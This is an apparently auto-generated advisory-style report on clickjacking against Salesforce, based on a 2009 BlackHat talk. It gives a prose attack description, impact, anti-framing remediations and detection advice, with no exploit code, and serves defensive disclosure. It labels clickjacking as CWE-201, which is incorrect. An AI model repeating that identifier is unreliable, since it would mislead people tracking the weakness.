Full Report
[part 2 in a series of 5 video write-ups from our BlackHat 09 talk, summary here] Goal The premise behind this video was that while we are migrating more and more services into the cloud, the front-end through which the services are accessed as well as managed is (in many cases) a web application and we still have not figured out how to write secure web applications reliably. The implication is that business-critical services and infrastructure maybe at risk due to a web developer’s mistake.
Analysis Summary
This analysis is based on publicly available information regarding a presentation demonstrated at BlackHat 2009 concerning Clickjacking vulnerabilities in Salesforce. Since the source material describes a live demonstration of a known class of attack against a specific vendor product from 2009, specific CVEs and definitive patch information directly tied to this *exact* demonstration may not be explicitly listed in the summary excerpt, but the underlying vulnerability type (Clickjacking) points to specific mitigation categories.
# Vulnerability: Clickjacking in Salesforce Web Interface
## CVE Details
- CVE ID: ***Not Explicitly Listed*** (Clickjacking is a broad class of vulnerability, often assigned CVEs when specific implementations are fixed, e.g., via X-Frame-Options headers.)
- CVSS Score: ***Not Explicitly Listed*** (Severity depends on the specific action being hijacked.)
- CWE: CWE-201 (UI Redressing/Clickjacking)
## Affected Systems
- Products: Salesforce CRM solution running on the Force.com platform.
- Versions: Older, unspecified versions prior to the defense mechanisms being widely deployed (circa 2009).
- Configurations: Any configuration relying solely on standard browser rendering without robust anti-framing directives.
## Vulnerability Description
The vulnerability demonstrated is **Clickjacking (UI Redressing)**. An attacker lures a victim user (already authenticated to Salesforce) to an external, malicious webpage. This malicious page loads the target Salesforce application interface within a transparent or obscured `<iframe>`. The attacker aligns hidden clickable elements on their page (e.g., a visible "Click here for dancing pigs" button) directly over sensitive interface elements in the underlying Salesforce frame (e.g., a "Delete Task" button). When the user clicks the visible element, they unknowingly execute the hidden, privileged action within the Salesforce session.
## Exploitation
- Status: **PoC available** (Demonstrated publicly at BlackHat 09).
- Complexity: Low (Requires social engineering to get the user to visit the malicious page).
- Attack Vector: Network (Requires the attacker's site to be visited by the victim).
## Impact
*Impact is highly dependent on the specific action being hijacked (e.g., deleting tasks, changing settings, escalating privileges).*
- Confidentiality: Potential exposure if sensitive data views can be triggered unknowingly.
- Integrity: High (Allows unauthorized modification or deletion of user data, such as tasks).
- Availability: Medium (Ability to delete critical records could impact service availability for the user).
## Remediation
### Patches
*Explicit patches for this specific 2009 demonstration are not cataloged here, but the standard industry fix for Clickjacking is:*
- Implementation of HTTP response headers like **`X-Frame-Options: DENY`** or **`SAMEORIGIN`** across all sensitive application frames.
- Use of content security policies (CSP) targeting `frame-ancestors`.
### Workarounds
- **User Education:** Warning users against clicking potentially malicious links, especially prompts that seem unrelated to the site they are currently viewing.
- **Strict Session Management:** Ensuring that highly sensitive actions (if they were present in 2009) require re-authentication.
## Detection
- **Indicators of Compromise:** Unusual record deletions, changes to user settings, or unexpected activity logged immediately following user navigation away from a known page.
- **Detection Methods and Tools:** Web Application Firewalls (WAFs) can sometimes be configured to inspect for or strip framing controls, although header enforcement is the primary defense. Security scanners should check for the presence and correct configuration of anti-framing headers.
## References
- Article Context: SensePost BlackHat 09 presentation on Clickjacking against Salesforce.
- Related Concept (Defanged): `hXXps://en.wikipedia.org/wiki/Clickjacking`
- Related Concept (Defanged): `hXXps://jeremiahgrossman.blogspot.com/2008/10/clickjacking-web-pages-can-see-and-hear.html`